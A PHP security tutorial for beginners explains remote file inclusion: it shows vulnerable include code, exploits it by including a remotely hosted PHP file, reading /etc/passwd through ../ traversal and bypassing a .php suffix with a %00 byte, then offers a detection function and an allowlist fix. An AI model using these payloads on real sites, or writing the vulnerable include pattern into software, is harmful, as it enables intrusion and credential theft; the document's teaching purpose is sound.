Discussing the causes of remote file inclusion vulnerabilities in PHP
For beginners
The first question is: what is a "remote file inclusion vulnerability"? The short answer is that the server ends up executing a malicious file because the PHP program does not strictly filter which file gets included. This is a filtering problem on the programmer's side. Please remember that all CGI programs have such bugs.
1. Finding a PHP remote file inclusion bug:
To find the bug, we must first understand what "inclusion" means. All languages (most of them, at least) have some way of including arbitrary files. In PHP we use the include() function, and it works like this:
To include include1.php in Main.php, you write include("include1.php"). This is not a very rigorous explanation, but you need to understand the idea.
Let's look at this first. When user input is passed in, that file is included, that is:

```php
// Vulnerable: the page parameter goes to include without any filtering
if ($_GET['page']) {
    include $_GET['page'];
} else {
    include "home.php";
}
```
This structure is common in dynamic websites. It lets pages be viewed through URLs such as http://www.target.com/explame.php?page=main.php or http://www.target.com/explame.php?page=downloads.php. If your program has a bug like this, that is very sad, and you have only yourself to blame. Although it is just a filtering problem, it is exactly this missing filtering that script hackers live on. In the zone-h.org survey, file inclusion accounts for 9.4% of attacks, which is enough to deserve our attention, and the problem is not a new one. It existed years ago, yet today batch after batch of programmers still go down the same old path. That is why this article exists. Writing this kind of article in 2004 is already a cliché, but I still have to write it. After all, it is not mere complaining if people gain something from it.
2. Test
Here is an example of remote file inclusion. It has only one purpose: the safety of your own programs. Let's look at the specifics:
http://www.target.com/explame.php?page=zizzy
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
The error messages output by PHP tell us that the program tried to include the file /var/www/htdocs/zizzy but could not find it. Did you see it? "No such file or directory": there is no such file. Now you understand the PHP remote file inclusion vulnerability.
3. Exploiting it
PHP is very accommodating and can open files remotely, so I create a yeah.txt and put it on my website at http://www.mysite.com/yeah.txt. Its content is:

```php
<?php
echo "Wow,test!";
?>
```
Then request http://www.target.com/explame.php?pa...e.com/yeah.txt
OK, it echoes "Wow,test!", so the code was executed. Reading config.php, which contains the MySQL password, is not difficult either. Change yeah.txt to <?php phpinfo(); ?> and take a look, or try writing it as system(). What do you think? Going a step further, submit page=../../../../../../../etc/passwd. Now you know what inclusion really means.
4. Another form of the PHP remote file inclusion vulnerability
Sometimes programmers change the way they write it and limit the scope of the inclusion, like this:

```php
// Still vulnerable: only a ".php" suffix is appended to the user input
if ($_GET['page']) {
    include "$_GET[page].php";
} else {
    include "home.php";
}
```
We submit http://www.target.com/explame.php?pa...e.com/yeah.txt
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3
The include failed because the suffix is forced to .php. So yeah.txt on mysite.com is renamed to yeah.php and, OK, it is executed as before.
What about passwd?
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3
Here a NUL character, which is %00, is used to get past the suffix check:
http://www.target.com/explame.php?pa.../etc/passwd%00
There it is.
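A log-review check for the three request shapes shown in sections 2 to 4 (remote URL, ../ traversal, NUL byte), as an added example that is not part of the original article. The function name classify_page_param and the sample request lines are assumptions made for illustration.

```php
<?php
// Added example: flag values of the include parameter that match the request
// shapes shown in sections 2-4. The parameter name "page" comes from the
// article; the function name and the request lines below are constructed.

function classify_page_param(string $requestUri): array
{
    $pos = strpos($requestUri, '?');
    if ($pos === false) {
        return [];
    }
    $raw = null;
    foreach (explode('&', substr($requestUri, $pos + 1)) as $pair) {
        $parts = explode('=', $pair, 2);
        if (rawurldecode($parts[0]) === 'page') {
            $raw = $parts[1] ?? '';
        }
    }
    if ($raw === null) {
        return [];
    }
    // Decode once, as PHP does before the value reaches include.
    $value = str_replace('\\', '/', urldecode($raw));
    $findings = [];
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
        $findings[] = 'remote-url';
    }
    if (preg_match('#(^|/)\.\.(/|$)#', $value)) {
        $findings[] = 'path-traversal';
    }
    if (strpos($value, "\0") !== false) {
        $findings[] = 'nul-byte';
    }
    return $findings;
}

$requests = [ // constructed sample request URIs
    '/explame.php?page=main.php',
    '/explame.php?page=http://www.mysite.com/yeah.txt',
    '/explame.php?page=../../../../../../../etc/passwd',
    '/explame.php?page=..%2F..%2Fetc%2Fpasswd%00',
];
foreach ($requests as $uri) {
    $hits = classify_page_param($uri);
    echo $uri, ' => ', $hits ? implode(', ', $hits) : 'ok', "\n";
}
```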
5. Recommendations
When including files, it is best to specify exactly which file to include, or to filter the submitted variable. That is the purpose of this article on PHP remote file inclusion vulnerabilities: it is not written for hackers, but for those who are new to programming. There are many such articles on the Internet. As long as someone benefits, the purpose has been achieved.
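One way to implement the recommendation to specify which files may be included, as an added example rather than code from the original article. The function name resolve_page, the PAGES table and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based page resolution. The page names and the
// pages/ directory are assumptions made for this illustration.

const PAGES = [
    'home'      => 'home.php',
    'main'      => 'main.php',
    'downloads' => 'downloads.php',
];

/**
 * Map the user-supplied page key to a file under $baseDir.
 * The request value is only used as an array key, never as part of a path.
 */
function resolve_page($requested, string $baseDir): string
{
    // Arrays (?page[]=x), missing values and unknown keys fall back to home.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        $requested = 'home';
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$requested];
}

// Constructed sample inputs covering the requests discussed in the article.
$samples = [
    'main',
    'http://www.mysite.com/yeah.txt',
    '../../../../../../../etc/passwd',
    "../../../../../../../etc/passwd\0",
    ['main'],
    null,
];

foreach ($samples as $value) {
    $shown = is_string($value) ? addcslashes($value, "\0") : gettype($value);
    printf("%-40s => %s\n", $shown, resolve_page($value, __DIR__ . '/pages'));
}

// In the front controller this becomes:
//   include resolve_page($_GET['page'] ?? null, __DIR__ . '/pages');
```

Independently of the code, allow_url_include=Off in php.ini (the default since the setting was introduced in PHP 5.2) stops include from fetching http:// URLs, and PHP 5.3.4 and later reject paths that contain a NUL byte. Neither of these stops ../ traversal to local files, which the allowlist does.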